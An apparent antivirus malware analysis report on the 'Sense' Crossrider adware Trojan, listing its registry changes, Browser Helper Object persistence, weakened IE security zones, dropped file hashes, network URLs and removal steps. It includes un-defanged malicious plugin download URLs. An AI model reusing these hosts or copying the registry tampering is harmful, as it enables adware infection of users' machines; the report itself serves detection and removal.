"URL" = "http://js.loadgenclientservice.com/plugins/mins/242.js"
[HKCU\Software\Sense\Plugins\35]
"Version" = "4"
[HKCU\Software\Sense\Plugins\183]
"Name" = "tabsWrapper"
[HKCU\Software\Sense\Plugins\184]
"Version" = "10"
[HKCU\Software\Sense\Plugins\123]
"Name" = "intext_adv_m"
[HKCU\Software\Sense\Plugins\269]
"Version" = "1"
[HKCU\Software\Sense]
"ActiveAppId" = "61915"
[HKCU\Software\Sense\Plugins\17]
"Name" = "jQuery"
[HKCU\Software\Sense\Manifest]
"Manifest" = "NA"
[HKCU\Software\Sense\Plugins\78]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/78.js"
[HKCU\Software\Sense\Plugins\2]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/2.js"
[HKCU\Software\Sense\Plugins\91]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/91.js"
[HKCU\Software\Sense\Plugins\123]
"Version" = "12"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Sense\Plugins\72]
"Version" = "5"
[HKCU\Software\Sense\Plugins\221]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/221.js"
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"
[HKCU\Software\Sense\Plugins\269]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/269.js"
[HKCU\Software\Sense\Plugins\72]
"Name" = "appApiValidation"
[HKCU\Software\Sense\Plugins\13]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/13.js"
[HKCU\Software\Sense\Plugins\9]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/9.js"
[HKCU\Software\Sense\Plugins\41]
"Name" = "IEInfo"
[HKCU\Software\Sense\Plugins\39]
"Name" = "IEDatabase"
[HKCU\Software\Sense\Plugins\244]
"Name" = "engageya_inner_m"
[HKCU\Software\Sense\Plugins\42]
"Version" = "10"
[HKCU\Software\Sense\Plugins\207]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/207.js"
[HKCU\Software\Sense\Plugins\244]
"Version" = "5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Sense\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,269,93,102,123,180,184,191,192,220,221,223,226,239,242,244,262,263,281,91"
[HKCU\Software\Sense\Plugins\102]
"Name" = "dealply_m"
[HKCU\Software\Sense\Plugins\7]
"Version" = "2"
[HKCU\Software\Sense\Manifest]
"PublisherId" = "20891"
[HKCU\Software\Sense\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Sense\Plugins\182]
"Name" = "openUrl"
[HKCU\Software\Sense\Plugins\180]
"Version" = "12"
[HKCU\Software\Sense\Plugins\182]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/182.js"
[HKCU\Software\Sense\Installer]
"FullVersion" = "1.34.8.12"
[HKCU\Software\Sense\Plugins\13]
"Version" = "7"
[HKCU\Software\Sense\Plugins\191]
"Version" = "7"
[HKCU\Software\Sense\Manifest]
"Description" = "."
[HKCU\Software\Sense\Plugins\191]
"Name" = "ciuvo_m"
[HKCU\Software\Sense\Installer]
"CodeDownloadDomain" = "http://js.loadgenclientservice.com"
[HKCU\Software\Sense\Plugins\46]
"Name" = "IETimers"
[HKCU\Software\Sense\Plugins\220]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/220.js"
[HKCU\Software\Sense\Plugins\3]
"Version" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Sense\Plugins\28]
"Version" = "4"
[HKCU\Software\Sense\Plugins\41]
"Version" = "7"
[HKCU\Software\Sense\Plugins\21]
"Name" = "debug"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Sense\Plugins\226]
"Name" = "set_campaign_id_m"
[HKCU\Software\Sense\Plugins\43]
"Version" = "5"
[HKCU\Software\Sense\Plugins\239]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/239.js"
[HKCU\Software\Sense\Plugins\220]
"Version" = "22"
[HKCU\Software\Sense\Installer]
"Time" = "1411237378"
[HKCU\Software\Sense\Plugins\4]
"Name" = "jquery_1_7_1"
[HKCU\Software\Sense\Plugins\37]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/37.js"
[HKCU\Software\Sense\Plugins\281]
"Name" = "ibario_tier3_pops_m"
[HKCU\Software\Sense\Plugins\40]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/40.js"
[HKCU\Software\Sense\Plugins\180]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/180.js"
[HKCU\Software\Sense\Plugins\44]
"Version" = "6"
[HKCU\Software\Sense\Plugins\4]
"URL" = "http://js.loadgenclientservice.com/plugins/javascripts/jquery-1_7_1_min.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Sense\Plugins\191]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/191.js"
[HKCU\Software\Sense\Plugins\192]
"Version" = "9"
[HKCU\Software\Sense\Plugins\36]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/36.js"
[HKCU\Software\Sense\Plugins\207]
"Name" = "dbWrapper"
[HKCU\Software\Sense\Plugins\246]
"Name" = "setup"
[HKCU\Software\Sense\Plugins\93]
"Name" = "superfish_no_coupons_m"
[HKCU\Software\Sense\Installer]
"CodeDownloadFbDomain" = "http://js.clientdemocloud.com"
[HKCU\Software\Sense\Plugins\22]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/22.js"
[HKCU\Software\Sense\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"
[HKCU\Software\Sense\Plugins\239]
"Version" = "7"
[HKCU\Software\Sense\Manifest]
"DisableIe" = "true"
"IsButtonEnabled" = "false"
[HKCU\Software\Sense\Plugins\192]
"Name" = "revizer_ws_dynamic_b2b_m"
[HKCU\Software\Sense\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"
[HKCU\Software\Sense\Plugins\40]
"Name" = "IEExtension"
[HKCU\Software\Sense\Manifest]
"PluginsManifestVersion" = "17"
"UninstallerOfferAction" = "NA"
[HKCU\Software\Crossrider]
"Bic" = "2C8E11B2DAE94BCFA5FC713470AE08E4IE"
[HKCU\Software\Sense\Plugins\39]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/39.js"
[HKCU\Software\Sense\Plugins\64]
"Version" = "3"
[HKCU\Software\Sense\Plugins\3]
"Name" = "ie8_fix_2"
[HKCU\Software\Sense\Manifest]
"homepageurl" = "NA"
"EnableSearchIE" = "false"
[HKCU\Software\Sense\Plugins\37]
"Name" = "IEBrowserEvents"
[HKCU\Software\Sense\Manifest]
"ThanksUrl" = "NA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Sense\Installer]
"Params" = "{ source_id : 000803, sub_id : 0, uzid : 0"
[HKCU\Software\Sense\Plugins\46]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/46.js"
[HKCU\Software\Sense\Plugins\17]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/17.js"
[HKCU\Software\Sense\Plugins\64]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/64.js"
[HKCU\Software\Sense\Plugins\45]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/45.js"
[HKCU\Software\Sense\Plugins\102]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/102.js"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all local web nodes that have no dots in their names and do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe:2568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 C5 45 80 A1 2D 28 B7 B3 1E 07 7F 09 52 A1 E6"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD7BF6E3-67C0-4DEC-9414-54B4FDE4BD83}]
"AppPath" = "%Program Files%\Sense"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{91F845-D61A-427A-B15C-1BB2BBCF33C1}]
"AppPath" = "%Program Files%\Sense"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{944F6B12-2BBE-456A-8DCB-1DA1876FC0AE}]
"Policy" = "3"
"AppPath" = "%Program Files%\Sense"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{91F845-D61A-427A-B15C-1BB2BBCF33C1}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD7BF6E3-67C0-4DEC-9414-54B4FDE4BD83}]
"AppName" = "a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe-codedownloader.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{944F6B12-2BBE-456A-8DCB-1DA1876FC0AE}]
"AppName" = "a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe-buttonutil.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{228FA0A2-7072-457F-A52-FC80B4C01743}]
"Policy" = "3"
"AppName" = "a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe-helper.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD7BF6E3-67C0-4DEC-9414-54B4FDE4BD83}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"{11111111-1111-1111-1111-110611191115}" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{11111111-1111-1111-1111-110611191115}" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{91F845-D61A-427A-B15C-1BB2BBCF33C1}]
"AppName" = "a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe-buttonutil64.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{228FA0A2-7072-457F-A52-FC80B4C01743}]
"AppPath" = "%Program Files%\Sense"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"Timestamp"
The process Tkbjndnqomlxl.exe:2840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrPublisherId" = "20891"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{df4d2963-44c4-48ce-b8b9-3535538f39c5}]
"AppPath" = "%Program Files%\Sense"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{df4d2963-44c4-48ce-b8b9-3535538f39c5}]
"AppPath" = "%Program Files%\Sense"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrAppId" = "61915"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{7377509d-1ea7-45ad-9827-4971a2b4a820}]
"Bic" = "2C8E11B2DAE94BCFA5FC713470AE08E4IE"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{df4d2963-44c4-48ce-b8b9-3535538f39c5}]
"AppName" = "Sense-bg.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"Sense-bg.exe" = "8000"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{7377509d-1ea7-45ad-9827-4971a2b4a820}]
"srcid_var" = "000803"
[HKLM\SOFTWARE\GlobalUpdate\UpdateDev]
"AuCheckPeriodMs" = "21600000"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{7377509d-1ea7-45ad-9827-4971a2b4a820}]
"pv" = "1.3.25.0"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{df4d2963-44c4-48ce-b8b9-3535538f39c5}]
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Sense\Installer]
"BundledFirefox" = "1"
"BundledIe" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"UninstallString" = "%Program Files%\Sense\Uninstall.exe /fcp=1"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{7377509d-1ea7-45ad-9827-4971a2b4a820}]
"Name" = "Object Browser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayName" = "Sense"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{7377509d-1ea7-45ad-9827-4971a2b4a820}]
"Verifier" = "39aa73fdbfd54b44fad467ed5553801b"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Sense\Installer]
"BundledAddCh" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 AF E5 DB D6 01 01 6A CA D1 D7 BD 94 07 06 E3"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{df4d2963-44c4-48ce-b8b9-3535538f39c5}]
"AppName" = "Sense-bg.exe"
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayIcon" = "%Program Files%\Sense\utils.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"Publisher" = "Object Browser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayVersion" = "1.34.8.12"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings to map all local web nodes that have no dots in their names and do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process regsvr32.exe:2328 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\TypeLib\{44444444-4444-4444-4444-440644194415}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Sense"
[HKCR\Interface\{66666666-6666-6666-6666-660666196615}]
"(Default)" = "ISandBox"
[HKCR\Interface\{55555555-5555-5555-5555-550655195515}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CrossriderApp0061915.Sandbox\CurVer]
"(Default)" = "CrossriderApp0061915.Sandbox"
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\InprocServer32]
"(Default)" = "%Program Files%\Sense\Sense-bho.dll"
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\InprocServer32]
"(Default)" = "%Program Files%\Sense\Sense-bho.dll"
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0061915"
[HKCR\CrossriderApp0061915.BHO.1]
"(Default)" = "CrossriderApp0061915"
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644194415}\1.0]
"(Default)" = "CrossriderApp0061915 Type Library"
[HKCR\Interface\{55555555-5555-5555-5555-550655195515}]
"(Default)" = "ICrossriderBHO"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644194415}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0061915.Sandbox"
[HKCR\CrossriderApp0061915.Sandbox.1]
"(Default)" = "CrossriderApp0061915.Sandbox"
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644194415}"
[HKCR\Interface\{55555555-5555-5555-5555-550655195515}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644194415}"
[HKCR\Interface\{55555555-5555-5555-5555-550655195515}\TypeLib]
"Version" = "1.0"
[HKCR\CrossriderApp0061915.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622192215}"
[HKCR\CrossriderApp0061915.BHO]
"(Default)" = "CrossriderApp0061915"
[HKCR\CrossriderApp0061915.BHO\CurVer]
"(Default)" = "CrossriderApp0061915"
[HKCR\CrossriderApp0061915.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622192215}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\ProgID]
"(Default)" = "CrossriderApp0061915.BHO.1"
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}]
"(Default)" = "Sense"
[HKCR\Interface\{66666666-6666-6666-6666-660666196615}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CrossriderApp0061915.Sandbox]
"(Default)" = "CrossriderApp0061915.Sandbox"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 3B 0C 9A BD EC 6C 81 F8 3D 71 2E D5 D3 9D 32"
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\Implemented Categories]
"(Default)" = ""
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\ProgID]
"(Default)" = "CrossriderApp0061915.Sandbox.1"
[HKCR\CrossriderApp0061915.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611191115}"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644194415}\1.0\0\win32]
"(Default)" = "%Program Files%\Sense\Sense-bho.dll"
[HKCR\Interface\{55555555-5555-5555-5555-550655195515}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644194415}"
[HKCR\Interface\{66666666-6666-6666-6666-660666196615}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}]
"(Default)" = "CrossriderApp0061915.Sandbox"
[HKCR\Interface\{66666666-6666-6666-6666-660666196615}\TypeLib]
"Version" = "1.0"
[HKCR\CrossriderApp0061915.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611191115}"
[HKCR\Interface\{66666666-6666-6666-6666-660666196615}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644194415}"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611191115}]
"NoExplorer" = "1"
"(Default)" = "CrossriderApp0061915"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\Programmable]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\InprocServer32]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\InprocServer32]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611191115}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\ProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622192215}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611191115}\Implemented Categories]
Dropped PE files
MD5 | File path |
---|---|
5ea67e0c698c6aa0edc4c05f0ea7a968 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\0007F3B4_Rar\%original file name%.exe |
00a0194c20ee912257df53bfe258ee4a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\System.dll |
7d8a3f7a171be884783cab827f170855 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\Tkbjndnqomlxl.exe |
c4fd010850fca98b91b2b1f69adc5dbe | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\WrapperUtils.dll |
0f962c0a31b227e06eb817f1e97a46c5 | c:\ljssj.pif |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
GoogleUpdate.exe:2616
GoogleUpdate.exe:2788
GoogleUpdate.exe:2396
GoogleUpdate.exe:3060
GoogleUpdate.exe:2140
GoogleUpdate.exe:3724
GoogleUpdate.exe:2504
a4f7d362-83b9-4acf-812c-4634a66ba943-4.exe:2092
%original file name%.exe:312
a4f7d362-83b9-4acf-812c-4634a66ba943-11.exe:3964
Sense-codedownloader.exe:3400
Sense-codedownloader.exe:3032
a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe:2568
Tkbjndnqomlxl.exe:2840
regsvr32.exe:2328
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 12.1.12.2
File Description: Isawirmknh
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 34880 | 35328 | 4.14496 | 673c97bebf576db6879567a0bfd3908a |
.data | 40960 | 140 | 512 | 0.818128 | a5a710a52d844b19513b2cab5693dbc3 |
.rdata | 45056 | 9108 | 9216 | 4.0908 | 004265d16597098398ce8e06897dcd29 |
.bss | 57344 | 252880 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 311296 | 4868 | 5120 | 3.64756 | 20f692042b54593897a705a64d67ce50 |
.ndata | 319488 | 409600 | 8192 | 0 | 0829f71740aab1ab98b33eae21dee122 |
.rsrc | 729088 | 94208 | 91136 | 5.39469 | 1a1166481991566210d96a66548e9d17 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://cds.d5k9g9i8.hwcdn.net/installer_updates/000803/update.json | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_08_12&bic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&app=61915&appver=0&verifier=39aa73fdbfd54b44fad467ed5553801b&srcid=000803&upi=03a471124f01b8b4a21fa91e866e62ed&version_date=14-09-03&subid=0&zdata=0&xpiver=0_95&crxver=1_26_21&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=0&procstarttime=1411237378&procruntime=2&rnd=1411237380 | |
